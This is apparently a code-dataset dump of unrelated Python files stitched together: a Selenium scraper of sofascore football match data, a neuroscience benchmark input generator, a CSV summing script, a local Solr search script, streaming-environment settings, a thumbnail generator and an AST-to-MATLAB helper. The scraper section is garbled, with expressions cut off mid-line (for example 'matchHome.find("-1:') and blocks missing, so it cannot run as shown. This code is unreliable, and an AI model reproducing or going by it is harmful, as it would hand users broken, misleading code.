[]\ncurrentTime = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\")\nfileName = str(start_date.year)+\"-\"+str(start_date.month)+\"_\"+str(end_date.year)+\"-\"+str(end_date.month)+\"_curr\"+currentTime\n\nmistakeNum = 0\n\"\"\"\noptions = Options()\noptions.set_headless(headless=True)\ndriver = webdriver.Firefox(firefox_options=options)\n\"\"\"\ndriver = webdriver.Firefox()\n#actions = ActionChains(driver)\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\ndef gIHTML(item):\n\treturn item.get_attribute('innerHTML')\n\nwith open('tournamentFinal.csv') as csvfile:\n\trowreader = csv.reader(csvfile)\n\tfor row in rowreader:\n\t\tacceptTournaments.add(row[0])\n\nwith open(\"{0}.csv\".format(fileName), \"w\") as csv_file:\n\twriter1 = csv.writer(csv_file)\n\twriter1.writerow([\"Event Name\",\"Date\",\t\"Home team\", \"Away team\", \"Halftime\", \"Fulltime\", \"Overtime\", \"Extratime\", \"Home team scores [Scorer name, minute]\", \"Away team scores [Scorer name, minute]\",\t\"Home team Penalty Shots [Penalty shooter name, Minute‚ Bool(Shot made)]\",\t\n\t\t\"Away team Penalty Shots [Penalty shooter name, Minute, Bool(Shot made)]\",\t\"Home Overtime [Bool(Shot made), Order]\", \"Away Overtime [Bool(Shot made), Order]\", \"Home Redcard [Red Cardee Name, Minute, Reason]\", \"Home Redcard [Red Cardee Name, Minute, Reason]\",\t\"Home Past 5 Games\", \"Home Past 5 Games Total\", \"Score Away Past 5 Games\", \"Away Past 5 Games Total Score\", \"Home Manager\", \"Away Manager\",\t\n\t\t\"Referee\", \"Referee Avg Yellow cards\", \"Referee Avg Red Cards\", \"Location\", \"Venue\", \"Attendance\"])\n#\ttry:\n\t#print(\"Opened writer!\")\n\tfor date in daterange(start_date, end_date):\n\t\ttry:\n\t\t\tdriver.get(\"https://www.sofascore.com/football/{0}-{1}-{2}\".format(date.year,str(date.month).zfill(2),str(date.day).zfill(2)))\n\t\t\tWebDriverWait(driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, 
\".event-list\")))\n\t\t\ttournaments = driver.find_elements_by_class_name('tournament')\n\t\t\t#print(\"****************************** \" + date.strftime(\"%Y-%m-%d\") + \" ******************************\")\n\t\t\tfor elem in tournaments:\n\t\t\t\tname = None\n\t\t\t\tcategory = None\n\t\t\t\t#print(\"Starting new League\")\n\t\t\t\tname = elem.find_elements_by_xpath('.//span[@class=\"tournament__name\"]')\n\t\t\t\tcategory = elem.find_elements_by_xpath('.//span[@class=\"tournament__category\"]')\n\t\t\t\tif len(name)>0:\n\t\t\t\t\teventName = category[0].text.strip()+\" \"+ name[0].text.strip()\n\t\t\t\t\tif eventName in acceptTournaments:\n\t\t\t\t\t\tprint(\"Event in tournament:\", eventName)\n\t\t\t\t\t\t#print(\"**************************************************************\"+eventName)\n\t\t\t\t\t\t#print(\"............\",category[0].text.strip(), name[0].text.strip(), \"............\")\n\t\t\t\t\t\t\n\t\t\t\t\t\tmatchLink = elem.find_elements_by_xpath('.//div[@class=\"js-event-list-tournament-events\"]/a')\n\t\t\t\t\t\tfor matchup in matchLink:\n\t\t\t\t\t\t\t#versus = None\n\t\t\t\t\t\t\tmatchHome = None\n\t\t\t\t\t\t\tmatchAway = None\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tnoIncidentData = False\n\t\t\t\t\t\t\theaderContainer = \"\"\n\n\t\t\t\t\t\t\thalfScore = \"\"\n\t\t\t\t\t\t\tfinalScore = \"\"\n\t\t\t\t\t\t\toverScore = \"\"\n\t\t\t\t\t\t\textraScore = \"\"\n\n\t\t\t\t\t\t\tawayScore = []\n\t\t\t\t\t\t\thomeScore = []\n\t\t\t\t\t\t\tawayPenalty = []\n\t\t\t\t\t\t\thomePenalty = []\n\t\t\t\t\t\t\tawayOverTime = []\n\t\t\t\t\t\t\thomeOverTime = []\n\t\t\t\t\t\t\tawayRedCards = []\n\t\t\t\t\t\t\thomeRedCards = []\n\n\t\t\t\t\t\t\thomePast5Games = []\n\t\t\t\t\t\t\thomePast5GamesTotalScore = \"\"\n\t\t\t\t\t\t\tawayPast5Games = []\n\t\t\t\t\t\t\tawayPast5GamesTotalScore = \"\"\n\n\t\t\t\t\t\t\thomeManager = \"\"\n\t\t\t\t\t\t\tawayManager = \"\"\n\n\t\t\t\t\t\t\tmatchReferee=\"\"\n\t\t\t\t\t\t\trefAvgYellowCards = \"\"\n\t\t\t\t\t\t\trefAvgRedCards = \"\"\n\t\t\t\t\t\t\tmatchLocation = \"\"\n\t\t\t\t\t\t\tmatchVenue = \"\"\n\t\t\t\t\t\t\tmatchAttendence = \"\"\n\n\t\t\t\t\t\t\t#versus = matchup.find_elements_by_xpath('.//div[@class=\"cell__section--main \"]/div')\n\t\t\t\t\t\t\tmatchHome= gIHTML(matchup.find_elements_by_xpath('.//div[@class=\"cell__section--main \"]/div')[0]).strip()\n\t\t\t\t\t\t\tmatchAway = gIHTML(matchup.find_elements_by_xpath('.//div[@class=\"cell__section--main \"]/div')[1]).strip()\n\t\t\t\t\t\t\t#print(matchHome, \"Vs. 
\", matchAway)\n\t\t\t\t\t\t\tif matchHome.find(\"-1:\n\t\t\t\t\t\t\t\tmatchHome = matchHome[:matchHome.find(\"-1:\n\t\t\t\t\t\t\t\tmatchAway = matchAway[:matchAway.find(\"0:\n\t\t\t\t\t\t\t\t\t\t#print(\"isAway\")\n\t\t\t\t\t\t\t\t\t\tisAway = True\n\n\t\t\t\t\t\t\t\t\tif len(goals)>0:\n\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\tscorer = elem.find_element_by_xpath('.//span[@class=\"incident__scorer\"]/a')\n\t\t\t\t\t\t\t\t\t\t\tscorerName = scorer.get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t#print(gIHTML(elem.find_element_by_xpath('.//span[@class=\"incident__scorer\"]')))\n\t\t\t\t\t\t\t\t\t\t\tscorer = elem.find_elements_by_xpath('.//span[@class=\"incident__scorer\"]/span')\n\t\t\t\t\t\t\t\t\t\t\tif len(scorer)==0:\n\t\t\t\t\t\t\t\t\t\t\t\tscorerName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tscorerName = scorer[0].get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\tscorerTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\tif scorerTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\tscorerTime = scorerTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\t#print(scorerTime)\n\t\t\t\t\t\t\t\t\t\tif isAway == True:\n\t\t\t\t\t\t\t\t\t\t\tawayScore.append([scorerName, scorerTime])\n\t\t\t\t\t\t\t\t\t\telse: \n\t\t\t\t\t\t\t\t\t\t\thomeScore.append([scorerName, scorerTime])\n\t\t\t\t\t\t\t\t\telif len(penalties)>0:\n\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\t#print(penaltyScorerTime)\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = penaltyScorerTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime != '-':\n\t\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = elem.find_element_by_xpath('.//span[@class=\"incident__scorer\"]/a')\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = penaltyScorer.get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorer = elem.find_elements_by_xpath('.//span[@class=\"incident__scorer\"]/span')\n\t\t\t\t\t\t\t\t\t\t\t\tif len(penaltyScorer)==0:\n\t\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = penaltyScorer[0].get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\t\tif isAway ==True: \n\t\t\t\t\t\t\t\t\t\t\t\tawayPenalty.append([penaltyScorerName, penaltyScorerTime, True])\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomePenalty.append([penaltyScorerName, penaltyScorerTime, True])\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tif isAway ==True:\n\t\t\t\t\t\t\t\t\t\t\t\tawayOverTime.append([True, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomeOverTime.append([True, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\telif len(missedPenalties) > 0:\n\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerTime = penaltyScorerTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\tif penaltyScorerTime != '-':\n\t\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = 
gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content\"]//a')).strip()\n\t\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyScorerName = elem.find_element_by_xpath('.//span').text\n\t\t\t\t\t\t\t\t\t\t\tif isAway ==True: \n\t\t\t\t\t\t\t\t\t\t\t\tawayPenalty.append([penaltyScorerName, penaltyScorerTime, False])\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomePenalty.append([penaltyScorerName, penaltyScorerTime, False])\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tif isAway == True:\n\t\t\t\t\t\t\t\t\t\t\t\tawayOverTime.append([False, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\thomeOverTime.append([False, penaltyOrder+1])\n\t\t\t\t\t\t\t\t\t\t\t\tpenaltyOrder+=1\n\t\t\t\t\t\t\t\t\telif len(redCards)>0:\n\t\t\t\t\t\t\t\t\t\ttry: \n\t\t\t\t\t\t\t\t\t\t\tredCardTime = gIHTML(elem.find_element_by_xpath('.//div[@class=\"cell__content incident__time\"]')).strip()\n\t\t\t\t\t\t\t\t\t\t\tif redCardTime.find('')>-1:\n\t\t\t\t\t\t\t\t\t\t\t\tredCardTime = redCardTime.replace('','').replace('','')\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\tredCardTime = \"OT\"\n\t\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\t\tredCarder = elem.find_element_by_xpath('.//div[@class=\"cell__content h4\"]/a')\n\t\t\t\t\t\t\t\t\t\t\tredCarderName = redCarder.get_attribute('data-player-name')\n\t\t\t\t\t\t\t\t\t\t\tif len(redCarderName) == 0:\n\t\t\t\t\t\t\t\t\t\t\t\tredCarderName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\t#print(\"Red card exception\")\n\t\t\t\t\t\t\t\t\t\t\tredCarder = elem.find_element_by_xpath('.//span')\n\t\t\t\t\t\t\t\t\t\t\tredCarderName = redCarder.text\n\t\t\t\t\t\t\t\t\t\t\tif len(redCarderName)==0:\n\t\t\t\t\t\t\t\t\t\t\t\tredCarderName = \"N/A\"\n\t\t\t\t\t\t\t\t\t\ttry: \n\t\t\t\t\t\t\t\t\t\t\tredCardReason = gIHTML(elem.find_element_by_xpath('.//span[@class=\"incident__dim\"]')).strip()\n\t\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\t\tif len(elem.find_elements_by_xpath('.//div[@title = \"2nd Yellow card (Red)\"]'))>0:\n\t\t\t\t\t\t\t\t\t\t\t\tredCardReason = \"2nd Yellow card\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tredCardReason = \"N/A\"\n\t\t\t\t\t\t\t\t\t\tif isAway==True:\n\t\t\t\t\t\t\t\t\t\t\tawayRedCards.append([redCarderName, redCardTime, redCardReason])\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\thomeRedCards.append([redCarderName, redCardTime, redCardReason])\n\t\t\t\t\t\t\t\t#print(homeScore, awayScore, homePenalty, awayPenalty, homeOverTime, awayOverTime, homeRedCards, awayRedCards)\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t#print(\"Scraping small data\")\n\t\t\t\t\t\t\t\t\theaderContainer = driver.find_element_by_xpath('.//div[@class=\"js-event-widget-header-container\"]//div[@class=\"cell__section--main u-tC\"]')\n\t\t\t\t\t\t\t\t\tprint(headerContainer)\n\t\t\t\t\t\t\t\t\tfinalScore = headerContainer.find_element_by_xpath('./div[@class=\"cell__content u-pT8\"]/span').text\n\t\t\t\t\t\t\t\t\tprint(finalScore)\n\t\t\t\t\t\t\t\t\thalfScore = headerContainer.find_elements_by_xpath('./div[@class=\"cell__content\"]/span[@class=\"u-t2 u-t16\"]')\n\t\t\t\t\t\t\t\t\tif len(halfScore)==0:\n\t\t\t\t\t\t\t\t\t\tprint(\"No halfscore!\")\n\t\t\t\t\t\t\t\t\t\thalfScore = \"N/A\"\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\thalfScore = halfScore[0].text[1:-1]\n\t\t\t\t\t\t\t\t\t#print(finalScore, halfScore)\n\n\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\tprint(\"No data 
found\")\n\t\t\t\t\t\t\t\t\tcontinue\n\n\n\t\t\t\t\t\t\tpGameForm = contentContainer.find_elements_by_xpath('.//div[@class=\"js-widget-teams-form widget-teams-form\"]/div')\n\t\t\t\t\t\t\tif len(pGameForm)==3:\n\t\t\t\t\t\t\t\tPGameForm1 = pGameForm[1]\n\t\t\t\t\t\t\t\tPGameForm2 = pGameForm[2]\n\t\t\t\t\t\t\t\tname1 = gIHTML(PGameForm1.find_element_by_xpath('.//div[@class=\"cell__content standings__team-name\"]')).strip()\n\t\t\t\t\t\t\t\tname2 = gIHTML(PGameForm2.find_element_by_xpath('.//div[@class=\"cell__content standings__team-name\"]')).strip()\n\t\t\t\t\t\t\t\tpast5Games1 = PGameForm1.find_elements_by_xpath('.//div[@class=\"cell__section standings__last-5\"]/div/span')\n\t\t\t\t\t\t\t\tpast5Games1Result = []\n\t\t\t\t\t\t\t\tfor item in past5Games1:\n\t\t\t\t\t\t\t\t\ttext = item.get_attribute('class')\n\t\t\t\t\t\t\t\t\tpast5Games1Result.append(text[text.find('-')+1:])\n\t\t\t\t\t\t\t\tpast5Games2 = PGameForm2.find_elements_by_xpath('.//div[@class=\"cell__section standings__last-5\"]/div/span')\n\t\t\t\t\t\t\t\tpast5Games2Result = []\n\t\t\t\t\t\t\t\tfor item in past5Games2:\n\t\t\t\t\t\t\t\t\ttext = item.get_attribute('class')\n\t\t\t\t\t\t\t\t\tpast5Games2Result.append(text[text.find('-')+1:])\n\t\t\t\t\t\t\t\tscore1 = gIHTML(PGameForm1.find_element_by_xpath('.//div[@class=\"cell__section standings__points\"]/div')).strip()\n\t\t\t\t\t\t\t\tscore2 = gIHTML(PGameForm2.find_element_by_xpath('.//div[@class=\"cell__section standings__points\"]/div')).strip()\n\t\t\t\t\t\t\t\tif matchHome.find(name1)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\t#print(matchHome, name1)\n\t\t\t\t\t\t\t\telif matchAway.find(name1)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\t#print(matchAway, name1)\n\t\t\t\t\t\t\t\telif matchHome.find(name2)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\t#print(matchHome, name2)\n\t\t\t\t\t\t\t\telif matchAway.find(name2)>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\t#print(matchAway, name2)\n\t\t\t\t\t\t\t\telif matchHome.find(name1[:2])>-1 and matchAway.find(name2[:2])>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\t#print(matchHome, name1)\n\t\t\t\t\t\t\t\telif matchAway.find(name1[:2])>-1 and matchHome.find(name2[:2])>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\t#print(matchAway, name1)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\thomePast5Games = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\tawayPast5Games = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = \"Can't 
tell!\"\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\t#print(matchHome, matchAway, name1, name2)\n\n\t\t\t\t\t\t\th2hPages = contentContainer.find_elements_by_xpath('.//div[@class=\"js-event-page-h2h-container\"]')\n\t\t\t\t\t\t\tif len(h2hPages)>0:\n\t\t\t\t\t\t\t\tfor page in h2hPages:\n\t\t\t\t\t\t\t\t\tif len(page.find_elements_by_xpath('./h3'))>0 and gIHTML(page.find_element_by_xpath('./h3')).strip()==\"Manager h2h\":\n\t\t\t\t\t\t\t\t\t\thomeManager = gIHTML(page.find_element_by_xpath('.//div[@class=\"cell__section--main u-tL\"]/div[@class=\"cell__content u-fs12\"]')).strip()\n\t\t\t\t\t\t\t\t\t\tawayManager = gIHTML(page.find_element_by_xpath('.//div[@class=\"cell__section--main u-tR\"]/div[@class=\"cell__content u-fs12\"]')).strip()\n\t\t\t\t\t\t\t\t\t\t#print(homeManager, awayManager)\n\n\n\t\t\t\t\t\t\tmatchInfo = contentContainer.find_elements_by_xpath('.//div[@class=\"js-event-page-info-container\"]')\n\t\t\t\t\t\t\tif len(matchInfo)>0:\n\t\t\t\t\t\t\t\ttableItems = matchInfo[0].find_elements_by_xpath('.//table/tbody/tr')\n\t\t\t\t\t\t\t\tfor item in tableItems:\n\t\t\t\t\t\t\t\t\trowItem = item.find_elements_by_xpath('./td')\n\t\t\t\t\t\t\t\t\tif gIHTML(rowItem[0])==\"Referee\":\n\t\t\t\t\t\t\t\t\t\tmatchReferee= gIHTML(rowItem[1]).strip()\n\t\t\t\t\t\t\t\t\t\t#print(\"matchReferee: \", matchReferee)\n\t\t\t\t\t\t\t\t\telif gIHTML(rowItem[0]) == \"Avg. cards\":\n\t\t\t\t\t\t\t\t\t\trefAvgCards = gIHTML(rowItem[1]).strip()\n\t\t\t\t\t\t\t\t\t\trefAvgCards = refAvgCards[refAvgCards.find('')+7:]\n\t\t\t\t\t\t\t\t\t\trefAvgRedCards = refAvgCards[:refAvgCards.find(' $nrn_ofile\\n'%(fname))\n nrn_run_fid.write('./table_line.sh $nrn_ofile\\n')\n\n arb_run_fid.write('arb_ofile=$ns_ring_out/arb_'+run_name+'.out\\n')\n arb_run_fid.write('run_with_mpi arb_ring %s > $arb_ofile\\n'%(fname))\n arb_run_fid.write('./table_line.sh $arb_ofile\\n')\n\n nrn_run_fid.write('echo\\n')\n arb_run_fid.write('echo\\n')\n\nnrn_run_fid.close()\narb_run_fid.close()\n","sub_path":"benchmarks/ring/generate_inputs.py","file_name":"generate_inputs.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"347937717","text":"#filename:python3 11pop_sum_dict.py\n# -*- coding: utf-8 -*-\n\nfile = open('0601a.csv', 'r')\ndata1 = []\ndata2 = []\nsum0 = 0\nfor line in file.readlines():\n\tline = line.strip('\\n')\n\tline = line.split(',')\n\titerm1 = line.pop(0)\n\titerm2 = line.pop(0)\n\titerm2_float = float(iterm2)\n\tsum0 = sum0 + iterm2_float\n\tprint(sum0)\n\nprint(sum0)\n\nhousework_dic = {}\nhousework_dic[iterm1] = sum0\nprint(housework_dic)\n\t\nfile.close()","sub_path":"DU_card/python/csv/11pop_sum_dict.py","file_name":"11pop_sum_dict.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"367012884","text":"import requests\nimport time\nimport sys\n\n\ndef convertHexData(row_birthmark):\n hex_row = \"\"\n for j in row_birthmark:\n for i in j.split(' '):\n try:\n hex_row += hex(int(i)).replace('0x', '')\n except:\n return row_birthmark\n hex_row += ','\n return hex_row\n\n\nimport os\nos.makedirs('search_result', exist_ok=True)\n\n# python3 postFile length birthmark\npostFile = sys.argv[1]\nlength = sys.argv[2]\nbirthmark = sys.argv[3]\nwith open(postFile, 'r') as f:\n import csv\n for row in csv.reader(f):\n if len(row[3:]) < int(length):\n continue\n if birthmark == 'uc':\n postData = 
','.join(row[3:])\n else:\n postData = convertHexData(row[3:])\n # print(postData)\n\n if birthmark == 'uc':\n payload = {'indent': 'on', 'q': 'data:'+postData, 'sort': 'score desc',\n 'wt': 'json', 'rows': '1000', 'fl': '*,score'}\n else:\n payload = {'indent': 'on', 'q': 'encode_data:'+postData, 'sort': 'score desc',\n 'wt': 'json', 'rows': '1000', 'fl': '*,score'}\n\n start = time.time()\n sumQtime = 0\n\n if birthmark == 'uc':\n r = requests.post(\n 'http://localhost:8983/solr/' + birthmark +\n '/query?fl=output,score,place,barthmark,data&rows=1000000&sort=score%20desc&wt=json',\n json={'query': 'data: ' + postData})\n else:\n r = requests.post(\n 'http://localhost:8983/solr/' + birthmark +\n '/query?fl=output,score,place,barthmark,data&rows=1000000&sort=score%20desc&wt=json',\n json={'query': 'encode_data: ' + postData})\n # print(r.json())\n maxScore = float(r.json()['response']['maxScore'])\n # print(maxScore)\n # print(float(r.json()['response']['docs'][-1]['score']))\n starts = 1000\n\n with open('search_result/'+row[0]+birthmark, 'a') as write_file:\n write_file.write(','.join(row) + '\\n')\n for result in r.json()['response']['docs']:\n # if float(result['score']) / maxScore < 0.001:\n # break\n write_file.write('{0},{1},{2},{3}\\n'.format(\n result['output'], float(result['score'])/maxScore, result['barthmark'], result['data'].replace('quot;', '')))\n # while True:\n # # print(maxScore)\n # with open('search_result/'+row[0]+birthmark, 'a') as write_file:\n # write_file.write(','.join(row) + '\\n')\n # for result in r.json()['response']['docs']:\n # if float(result['score']) / maxScore < 0.001:\n # break\n # write_file.write('{0},{1},{2},{3}\\n'.format(\n # result['output'], float(result['score'])/maxScore, result['barthmark'], result['data'].replace('quot;', '')))\n # # if float(float(r.json()['response']['docs'][-1]['score']) / maxScore) < 0.001:\n # # break\n # if int(starts) > 4510:\n # break\n # if birthmark == 'uc':\n # payload = {'indent': 'on', 'q': 'data:'+postData,\n # 'wt': 'json', 'rows': '1000', 'fl': '*,score', 'start': starts}\n # else:\n # payload = {'indent': 'on', 'q': 'encode_data:'+postData,\n # 'wt': 'json', 'rows': '1000', 'fl': '*,score', 'start': starts}\n # r = requests.post(\n # 'http://localhost:8983/solr/' + birthmark +\n # '/query?fl=output,score,place,barthmark,data&rows=1000&sort=score%20desc&wt=json&start=' +\n # str(starts),\n # json={'query': 'encode_data: ' + postData})\n # # r = requests.get(\n # # 'http://localhost:8983/solr/' + birthmark + '/select', params=payload)\n # starts += 1000\n # # qtime\n # sumQtime += r.json()['responseHeader']['QTime']\n # # print('{0}, {1}'.format(maxScore, float(\n # # r.json()['response']['docs'][-1]['score'])))\n # # print(sumQtime)\n # elapsed_time = time.time() - start\n # # print(\"elapsed_time:{0}\".format(elapsed_time) + \"[sec]\")\n\n elapsed_time = time.time() - start\n # print(\"elapsed_time:{0}\".format(elapsed_time) + \"[sec]\")\n","sub_path":"docs/docs_for_research/procudure-of-experimental/FN/row_search_once.py","file_name":"row_search_once.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"639300631","text":"class EnvArgs:\n\tdef __init__(self):\n\t\t# env settings\n\t\tself.s_info = 12\n\t\tself.s_len = 200 # frame based info\n\t\tself.s_gop_len = 8 # frame based info\n\t\tself.s_gop_info = 12\n\t\tself.a_dim = 8\n\t\tself.random_seed = 50\n\t\tself.bitrate_levels = 4\n\t\tself.bitrate = [500.0, 
850.0, 1200.0, 1850.0] # kbps\n\t\tself.target_buffer_levels = 2\n\t\tself.target_buffer = [2.0, 3.0] # seconds\n\n\t\tself.frame_time_len = 0.04\n\t\tself.smooth_penalty = 0.02\n\t\tself.rebuf_penalty = 1.5\n\t\tself.latency_penalty = 0.005\n\n\t\tself.bw_trace = '../../trace/network_trace/high/'\n\t\tself.video_size_files = \\\n\t\t['../../trace/video_trace/AsianCup_China_Uzbekistan/frame_trace_',\n\t\t'../../trace/video_trace/Fengtimo_2018_11_3/frame_trace_',\n\t\t'../../trace/video_trace/YYF_2018_08_12/frame_trace_']\n\t\t# self.log_path = './log/'","sub_path":"env_args_pretrain.py","file_name":"env_args_pretrain.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"74123168","text":"import os\nimport requests\nfrom PIL import Image\nfrom library import settings\n\n\ndef thumbnail_path(id):\n return os.path.join(settings.STATIC_ROOT, 'images', 'thumbnails', f'{id}.png')\n\n\ndef exists(id):\n path = thumbnail_path(id)\n return os.path.exists(path) and os.path.getsize(path) > 1024\n\n\ndef generate(id):\n url = f'{settings.BASE_HUB_URL}/services/sharing/notebooks/{id}/preview/image/'\n\n # Lazily create thumbnail directory\n filename = thumbnail_path(id)\n create_directory(os.path.dirname(filename))\n\n # Download the preview image\n r = requests.get(url)\n thumb_file = open(filename, 'wb')\n thumb_file.write(r.content)\n thumb_file.close()\n\n # Overwrite it with the thumbnail\n create_thumbnail(filename)\n\n\ndef create_directory(directory_path):\n if not os.path.exists(directory_path):\n os.mkdir(directory_path)\n\n\ndef create_thumbnail(filename):\n desired_size = 200\n\n im = Image.open(filename)\n old_width, old_height = im.size # old_size[0] is in (width, height) format\n\n new_height = int(float(old_height * desired_size) / old_width)\n\n im = im.resize((desired_size, new_height), Image.ANTIALIAS)\n im = im.crop((0, 0, desired_size, desired_size))\n\n # create a new image and paste the resized on it\n new_im = Image.new(\"RGB\", (desired_size, desired_size), (255, 255, 255, 0))\n new_im.paste(im, (0, 0))\n\n new_im.save(filename)\n","sub_path":"library/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"426408455","text":"import ast\n\ndef str_to_expr(s):\n return ast.parse(s).body[0]\n\ndef convert_ast_to_sympy(a):\n pass\n\n\nclass WriteMatlab(ast.NodeVisitor):\n\n def visit_BinOp(self,b):\n lhs = self.visit(b.left)\n rhs = self.visit(b.right)\n print( \"{} + {}\".format(lhs,rhs) )\n\n\ndef print_matlab(sexpr):\n from dolo.compiler.codegen import to_source\n ss = (to_source(sexpr))\n ss = ss.replace(' ** ', '.^')\n ss = ss.replace(' * ', '.*')\n ss = ss.replace(' / ', './')\n return ss\n\ndef expr_to_sympy(sexpr):\n from dolo.compiler.codegen import to_source\n ss = (to_source(sexpr))\n import sympy\n return sympy.sympify(ss)\n\n\ndef 